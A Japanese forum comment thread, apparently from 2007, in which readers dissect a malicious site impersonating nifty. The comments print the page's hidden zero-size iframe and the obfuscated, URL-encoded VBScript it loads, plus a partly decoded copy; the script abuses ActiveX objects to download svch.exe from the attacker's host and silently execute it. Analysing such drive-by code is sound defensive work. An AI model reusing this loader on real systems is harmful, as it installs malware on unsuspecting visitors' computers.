パスワードを忘れた? アカウント作成
この議論は賞味期限が切れたので、アーカイブ化されています。 新たにコメントを付けることはできません。

niftyに偽装した悪意のあるサイトが登場」記事へのコメント

  • w3mで見たら、 (スコア:5, おもしろおかしい)

    by Anonymous Coward
    <html>
    <head>
    <meta http-equiv="Content-Language" content="zh-cn">
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <title></title>
    </head>
    <body bgcolor="#9CCCFF" topmargin="80" leftmargin="0">
    <p align="center"><img border="0" src="img.gif" width="0" height="0"></p>
    <iframe src="httP://www.homepage3-nifty.com/online/admin.htm" name="zhu" width="0" height="0" frameborder="0"></body>
    </html>

    しか見えませんでした。
    • Re:w3mで見たら、 (スコア:0, 余計なもの)

      by Anonymous Coward on 2007年01月03日 18時02分 (#1085987)
      さらに,iframeの中をLynxで見てみました。ソースは以下。
      <SCRIPT>var Words="%3Chtml%3E%0D%0A %3Cscript language%3D%22VBScript%22%3E%0D%0
      +A on error resume next%0D%0A dl %3D %22http%3A%2F%2Fwww%2Ehomepage3%2Dni
      +fty%2Ecom%2Fonline%2Fsvch%2Eexe%22%0D%0A Set df %3D document%2EcreateElemen
      +t%28%22object%22%29%0D%0A df%2EsetAttribute %22classid%22%2C %22clsid%3ABD9
      +6C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%0D%0A str%3D%22Microsoft%2EXML
      +HTTP%22%0D%0A Set x %3D df%2ECreateObject%28str%2C%22%22%29%0D%0A a1%3D%
      +22Ado%22%0D%0A a2%3D%22db%2E%22%0D%0A a3%3D%22Str%22%0D%0A a4%3D%22ea
      +m%22%0D%0A str1%3Da1%26a2%26a3%26a4%0D%0A str5%3Dstr1%0D%0A set S %3D
      + df%2Ecreateobject%28str5%2C%22%22%29%0D%0A S%2Etype %3D 1%0D%0A str6%3D
      +%22GET%22%0D%0A x%2EOpen str6%2C dl%2C False%0D%0A x%2ESend%0D%0A fna
      +me1%3D%22g0ld%2Ecom%22%0D%0A set F %3D df%2Ecreateobject%28%22Scripting%2EF
      +ileSystemObject%22%2C%22%22%29%0D%0A set tmp %3D F%2EGetSpecialFolder%282%2
      +9 %0D%0A fname1%3D F%2EBuildPath%28tmp%2Cfname1%29%0D%0A S%2Eopen%0D%0A
      + S%2Ewrite x%2EresponseBody%0D%0A S%2Esavetofile fname1%2C2%0D%0A S%2E
      +close%0D%0A set Q %3D df%2Ecreateobject%28%22Shell%2EApplication%22%2C%22%2
      +2%29%0D%0A Q%2EShellExecute fname1%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A
      + %3C%2Fscript%3E%0D%0A %3Chead%3E%0D%0A %3C%2Fbody%3E%3C%2Fhtml%3E
      + %0D%0A %0D%0A";document.write(unescape(Words))</SCRIPT>
      親コメント
      • Re:w3mで見たら、 (スコア:0, 余計なもの)

        by Anonymous Coward
        はい、ついでにadmin.htm をデコードしてみました。
        一部伏字にしときます。
        svch.exe は別コメントがあるので省略。

        <SCRIPT>var Words="<html>
        <script language="VBScript">
            on error resume next
            dl = "http://www.homepage3-nifty.com/online/svch.exe"
            Set df = document.createElement("object")
            df.setAttribute "classid", "clsid: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"
            str="Microsoft.XMLHTTP"
            Set x = df.CreateObject(str,"")
            a1=

目玉の数さえ十分あれば、どんなバグも深刻ではない -- Eric Raymond

処理中...